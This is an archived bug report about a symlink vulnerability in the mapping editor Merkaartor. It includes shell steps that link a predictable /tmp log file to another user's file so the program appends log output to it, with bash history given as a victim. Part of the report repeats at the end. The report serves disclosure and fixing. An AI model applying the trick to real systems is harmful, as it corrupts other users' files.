You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
{{ message }}
This repository has been archived by the owner on Jul 24, 2021. It is now read-only.
Reporter: bernd[at]bzed.de [Submitted to the original trac issue database at 7.04am, Sunday, 27th September 2009]
[Forwarded from http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=548546]
Found a minor symlink attack in merkaartor. It allows a local attacker
to append the contents of the merkaartor log file to arbitrary files
owned by the user running merkaartor.
It may be used to DoS any applications that require their data files to
be valid before starting.
While no data loss is immediately obvious, it is possible that
corrupting files by appending data could lead other software to destroy
the newly corrupted data. An example of this could be bash. A merkaartor
log file can be fairly long if the user has enabled map tile downloads
and browses a large area and lots of tiles over one map editing session.
Merkaartor would append many lines to the user's bash history and next
time they start bash, their bash history could be larger than bash's
history limit settings, then bash would take the latest lines (all
merkaartor logs) and discard the legitimate bash history.
Steps to reproduce:
pabs@chianamo:~/tmp$ sudo rm -f /tmp/merkaartor.log /home/pabs/tmp/foo.log
pabs@chianamo:~/tmp$ sudo su -c 'ln -s /home/pabs/tmp/foo.log /tmp/merkaartor.log' nobody
pabs@chianamo:~/tmp$ ls -l /home/pabs/tmp/foo.log /tmp/merkaartor.log
ls: cannot access /home/pabs/tmp/foo.log: No such file or directory
lrwxrwxrwx 1 nobody nogroup 22 2009-09-27 11:49 /tmp/merkaartor.log -> /home/pabs/tmp/foo.log
pabs@chianamo:~/tmp$ merkaartor
**** "2009-09-27T11:49:39" -- Starting "Merkaartor 0.14"
------- "using QT version 4.5.2 (built with 4.5.2)"
------- on X11
**** "2009-09-27T11:49:42" -- Ending "Merkaartor 0.14"
pabs@chianamo:~/tmp$ ls -l /home/pabs/tmp/foo.log /tmp/merkaartor.log
-rw-r----- 1 pabs pabs 189 2009-09-27 11:49 /home/pabs/tmp/foo.log
lrwxrwxrwx 1 nobody nogroup 22 2009-09-27 11:49 /tmp/merkaartor.log -> /home/pabs/tmp/foo.log
pabs@chianamo:~/tmp$ cat /home/pabs/tmp/foo.log
**** "2009-09-27T11:49:39" -- Starting "Merkaartor 0.14"
------- "using QT version 4.5.2 (built with 4.5.2)"
------- on X11
**** "2009-09-27T11:49:42" -- Ending "Merkaartor 0.14"
pabs@chianamo:~/tmp$ echo test > foo.log
pabs@chianamo:~/tmp$ cat /home/pabs/tmp/foo.log
test
pabs@chianamo:~/tmp$ merkaartor
**** "2009-09-27T11:50:20" -- Starting "Merkaartor 0.14"
------- "using QT version 4.5.2 (built with 4.5.2)"
------- on X11
**** "2009-09-27T11:50:24" -- Ending "Merkaartor 0.14"
pabs@chianamo:~/tmp$ cat /home/pabs/tmp/foo.log
test
**** "2009-09-27T11:50:20" -- Starting "Merkaartor 0.14"
------- "using QT version 4.5.2 (built with 4.5.2)"
------- on X11
**** "2009-09-27T11:50:24" -- Ending "Merkaartor 0.14"
pabs@chianamo:~/tmp$ ls -l /home/pabs/tmp/foo.log /tmp/merkaartor.log
-rw-r----- 1 pabs pabs 194 2009-09-27 11:50 /home/pabs/tmp/foo.log
lrwxrwxrwx 1 nobody nogroup 22 2009-09-27 11:49 /tmp/merkaartor.log -> /home/pabs/tmp/foo.log
The text was updated successfully, but these errors were encountered:
Author: bernd[at]bzed.de [Added to the original trac issue at 10.48am, Tuesday, 29th September 2009]
There are two ways to avoid such bugs:
If you write files into public temp directories, make sure the name is not
guessable - use mkstemp for example.
Put files into a directory which is accessible by the user only.
Another idea would be to allow the user to enable logging and let him choose the
place where the log should go to. Then it is not the software's fault, if the
user has issues with such attacks.
Reporter: bernd[at]bzed.de
[Submitted to the original trac issue database at 7.04am, Sunday, 27th September 2009]
[Forwarded from http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=548546]
Found a minor symlink attack in merkaartor. It allows a local attacker
to append the contents of the merkaartor log file to arbitrary files
owned by the user running merkaartor.
It may be used to DoS any applications that require their data files to
be valid before starting.
While no data loss is immediately obvious, it is possible that
corrupting files by appending data could lead other software to destroy
the newly corrupted data. An example of this could be bash. A merkaartor
log file can be fairly long if the user has enabled map tile downloads
and browses a large area and lots of tiles over one map editing session.
Merkaartor would append many lines to the user's bash history and next
time they start bash, their bash history could be larger than bash's
history limit settings, then bash would take the latest lines (all
merkaartor logs) and discard the legitimate bash history.
Steps to reproduce:
The text was updated successfully, but these errors were encountered: